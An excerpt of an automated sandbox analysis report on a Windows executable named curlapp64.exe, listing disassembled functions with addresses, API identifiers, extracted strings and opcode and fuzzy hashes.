                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                • Opcode ID: 9754927367e6848381b861c8ed9dc860233e9b8de17360e42a4e2eb4be7fcd8b
                                                                                                                                • Instruction ID: b0d7888b20515b2dbf09ce940fde4ad309f714b9ed8109220e2e59eb24225a40
                                                                                                                                • Opcode Fuzzy Hash: 9754927367e6848381b861c8ed9dc860233e9b8de17360e42a4e2eb4be7fcd8b
                                                                                                                                • Instruction Fuzzy Hash: 9F111C36B14B4189EB008FA0E8642B833B4FB19759F440A31DBAD867A4EF78D1588340
                                                                                                                                Function 00007FF8BA24DE10 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                • Opcode ID: c8cdf1e9fd00de5acfafd2f8202f34d4a15b464e92bf36e3d66a35bc2a84f537
                                                                                                                                • Instruction ID: 2b36c6023316d5765d465d6663bf9a750372ba7285491e34ac55de57bf411819
                                                                                                                                • Opcode Fuzzy Hash: c8cdf1e9fd00de5acfafd2f8202f34d4a15b464e92bf36e3d66a35bc2a84f537
                                                                                                                                • Instruction Fuzzy Hash: 2F112E22B14F068AEB00DF64E8542B933A4FB59B98F441E31DF6D46BA8DF78E5588340
                                                                                                                                Function 00007FF6CABB5E30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: http://
                                                                                                                                • API String ID: 3668304517-1121587658
                                                                                                                                • Opcode ID: fe9e7e2e38a054dfc441c57ac3f524ec66abeed958864421d2b95fa61fc15c85
                                                                                                                                • Instruction ID: 77923b9bc56b69fe7bef34f514c7f912bea9699e54e317f4c76f248401a94dd6
                                                                                                                                • Opcode Fuzzy Hash: fe9e7e2e38a054dfc441c57ac3f524ec66abeed958864421d2b95fa61fc15c85
                                                                                                                                • Instruction Fuzzy Hash: 67512A62B1868545EA109F25F1B42BD9361EF46BE5F504371EAED87BD9DE3CE481C300
                                                                                                                                Function 00007FF6CABE7DAC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __except_validate_context_record
                                                                                                                                • String ID: csm$csm
                                                                                                                                • API String ID: 1467352782-3733052814
                                                                                                                                • Opcode ID: fa9c56668ff7342f8887f4681424924f8640ad2fcbb945aeb66669c86d202130
                                                                                                                                • Instruction ID: 69a3d64868bdeacccb26a1dbac5a6c999b0cddcfef5b7c53948ec9fb769e452b
                                                                                                                                • Opcode Fuzzy Hash: fa9c56668ff7342f8887f4681424924f8640ad2fcbb945aeb66669c86d202130
                                                                                                                                • Instruction Fuzzy Hash: 0971A2729086C286D7618F65E06477D7BA0FB06B9AF1481F5DACC87A86CF3CD991C780
                                                                                                                                Function 00007FF6CABE8444 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                • String ID: csm
                                                                                                                                • API String ID: 2558813199-1018135373
                                                                                                                                • Opcode ID: 596155c40a8d4c365ea1edc6a1332c0715f3a9774cdc13da868567e95002e52c
                                                                                                                                • Instruction ID: 673ac88a7df8a1fe491f703df246ee22394ef0aca5247995415f71a1d04a0d63
                                                                                                                                • Opcode Fuzzy Hash: 596155c40a8d4c365ea1edc6a1332c0715f3a9774cdc13da868567e95002e52c
                                                                                                                                • Instruction Fuzzy Hash: 0D517236618B4186EA20DF56F15026D77A4FB8AB91F1402B5DBCD87B55CF3CE490CB40
                                                                                                                                Function 00007FF6CABF2FF8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                • String ID: C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                • API String ID: 3307058713-4127270699
                                                                                                                                • Opcode ID: c6a06be8a8fa24f3f24792639dc78f7347afc7f15bdb07778fba461248c64965
                                                                                                                                • Instruction ID: a519776f33151635a8f5b4b785f4da0e90ecd3fe69be0d1bc496e7f693383b3c
                                                                                                                                • Opcode Fuzzy Hash: c6a06be8a8fa24f3f24792639dc78f7347afc7f15bdb07778fba461248c64965
                                                                                                                                • Instruction Fuzzy Hash: A941B33EA08B4286EB14DF25F9601B927A4EF45795B1840BAEE8E83B45DF3DE491C340
                                                                                                                                Function 00007FF6CABDAD30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: \printui.exe
                                                                                                                                • API String ID: 73155330-2025757019
                                                                                                                                • Opcode ID: f18ebbe832b9a5d8e26df2fdf01dc76cc07484e0da531c7b73cfe8b601086112
                                                                                                                                • Instruction ID: 60ca7827dc07feef2141ea268b0915824fe776427304b9108b45c89d255563a0
                                                                                                                                • Opcode Fuzzy Hash: f18ebbe832b9a5d8e26df2fdf01dc76cc07484e0da531c7b73cfe8b601086112
                                                                                                                                • Instruction Fuzzy Hash: 1331F222B15A8A82EE14DE21F0202BDA361EB45FD6F644A75CBED877D9DE3CE050C300
                                                                                                                                Function 00007FF6CABF6C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                • Opcode ID: 52cd24085de4200e5b0326f7b45c8803d0ef1a00770d230934afa6f2523a4469
                                                                                                                                • Instruction ID: 8279cb26e978787507342a7a34ad535dfb9d2fa91689cab4fa2add897863fee2
                                                                                                                                • Opcode Fuzzy Hash: 52cd24085de4200e5b0326f7b45c8803d0ef1a00770d230934afa6f2523a4469
                                                                                                                                • Instruction Fuzzy Hash: 1141C22AA19A8286D7208F65F8247E9B7A0FB49785F444175EE8DC7758EF3CD440C740
                                                                                                                                Function 00007FF6CABC6F1E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: iterator does not fit current value$iterator out of range
                                                                                                                                • API String ID: 3668304517-1046077056
                                                                                                                                • Opcode ID: 01d1f281ac7da48f37706de959b4f656b5092fad53d3e73080f9185371dbd55b
                                                                                                                                • Instruction ID: ac619b290ef928d996274ed3f88e4053369fecf874e8b771ad23955fdf663c1e
                                                                                                                                • Opcode Fuzzy Hash: 01d1f281ac7da48f37706de959b4f656b5092fad53d3e73080f9185371dbd55b
                                                                                                                                • Instruction Fuzzy Hash: 5A31C562A09686A2EB10EF20F4707ED6321FB92345F9045B2D7CD87AA6DF3CD985C740
                                                                                                                                Function 00007FF6CABC6F7B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: iterator does not fit current value$iterator out of range
                                                                                                                                • API String ID: 3668304517-1046077056
                                                                                                                                • Opcode ID: 33e2c8a7d215e2ebefc1ec216248bfeca9b128255ed12b1ca1ffc27078cceabc
                                                                                                                                • Instruction ID: b934787091e5bcab2b207e8c5bccdfdec95bb1394a041411dc1c1076dcfe91eb
                                                                                                                                • Opcode Fuzzy Hash: 33e2c8a7d215e2ebefc1ec216248bfeca9b128255ed12b1ca1ffc27078cceabc
                                                                                                                                • Instruction Fuzzy Hash: 4B31B422A09646A2EB10EF20F4706ED6321FF82745F805572D7DD87AA5DF3CD985C740
                                                                                                                                Function 00007FF6CABD747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Number is too big.
                                                                                                                                • API String ID: 909987262-3173473636
                                                                                                                                • Opcode ID: a090ed241591c4a4d52f45b25e649df27c845dfd1e763d09a8b0af8231d4fb1c
                                                                                                                                • Instruction ID: 347bacae6bc118ffe50d229d7d8529ef8dd7dfffbc24f37fe14d9e6b399f6217
                                                                                                                                • Opcode Fuzzy Hash: a090ed241591c4a4d52f45b25e649df27c845dfd1e763d09a8b0af8231d4fb1c
                                                                                                                                • Instruction Fuzzy Hash: 86113A62C0C1874EF1596E78246A1FC2E508F5361AF984EF5D3ED826DFAD0C6882C582
                                                                                                                                Function 00007FF6CABD759E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Number is too big.
                                                                                                                                • API String ID: 909987262-3173473636
                                                                                                                                • Opcode ID: 8388db52fe5aa1dff4b0802fdf7136aaab611b643d2846209ab891bdd2e59d7b
                                                                                                                                • Instruction ID: 0fbbb01616ead6942e76cbfe4f6f7ea727017fb5013dd66f10a3cf7651e9803d
                                                                                                                                • Opcode Fuzzy Hash: 8388db52fe5aa1dff4b0802fdf7136aaab611b643d2846209ab891bdd2e59d7b
                                                                                                                                • Instruction Fuzzy Hash: 76211842C0D1874AF66A6F78347A1FD6E508F63746F9449F6D3E982ACBFC0C6484C251
                                                                                                                                Function 00007FF6CABE5B70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CABB11FF), ref: 00007FF6CABE5BC0
                                                                                                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CABB11FF), ref: 00007FF6CABE5C01
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                • String ID: csm
                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                • Opcode ID: 3f99c14d675360cdb2fd672c74c8d20d49bed5fe7e78e3d1762e74f12cc6558c
                                                                                                                                • Instruction ID: 390d38e50a48b69b4e9dc8e541f3eaeabff3a6c2becefb94ec04254e2d166e85
                                                                                                                                • Opcode Fuzzy Hash: 3f99c14d675360cdb2fd672c74c8d20d49bed5fe7e78e3d1762e74f12cc6558c
                                                                                                                                • Instruction Fuzzy Hash: 45114672618B8082EB208F25F51026AB7E5FB88B95F1842B0EBCC47B68DF3DD551CB00
                                                                                                                                Function 00007FF6CABD7550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Precision is not an integer.$Width is not an integer.
                                                                                                                                • API String ID: 909987262-2148321804
                                                                                                                                • Opcode ID: 4ba6db31c8cdbc95cffc2736e94b089ef682b164423f77285008a3c18570d7f0
                                                                                                                                • Instruction ID: 93b3beaf4299d4b3ea55f42b67204722ca8967ad3a952c0d0ee89996c52cd76d
                                                                                                                                • Opcode Fuzzy Hash: 4ba6db31c8cdbc95cffc2736e94b089ef682b164423f77285008a3c18570d7f0
                                                                                                                                • Instruction Fuzzy Hash: 6FA00210D1D445D5E504AF11BCA50A452205F65301F904571D5AD816565D1D55554610
                                                                                                                                Function 00007FF8A930CA60 Relevance: 5.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$calloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3095843317-0
                                                                                                                                • Opcode ID: 3a796d053fe83774da181f9bcbb7c67fc2bdfbbec19fcfff4edb20b7d84a978c
                                                                                                                                • Instruction ID: 8cb634d901c2617d66acda5f4daa5d97f823a9af393ff1874c8c6f656b7dfe33
                                                                                                                                • Opcode Fuzzy Hash: 3a796d053fe83774da181f9bcbb7c67fc2bdfbbec19fcfff4edb20b7d84a978c
                                                                                                                                • Instruction Fuzzy Hash: 57117C32A0EFC292E7108F55E44016AB3B1FB88BC4F089035EE8A97B55CF7CD5018B00